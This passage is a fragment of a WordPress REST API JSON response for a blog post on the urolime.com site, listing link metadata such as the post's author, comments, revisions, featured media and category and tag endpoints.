Smart\u201d.","sameAs":["https:\/\/www.urolime.com\/"],"url":"https:\/\/www.urolime.com\/blogs\/ae\/author\/blogadmin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/posts\/2702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/comments?post=2702"}],"version-history":[{"count":1,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/posts\/2702\/revisions"}],"predecessor-version":[{"id":2706,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/posts\/2702\/revisions\/2706"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/media\/2705"}],"wp:attachment":[{"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/media?parent=2702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/categories?post=2702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/ae\/wp-json\/wp\/v2\/tags?post=2702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}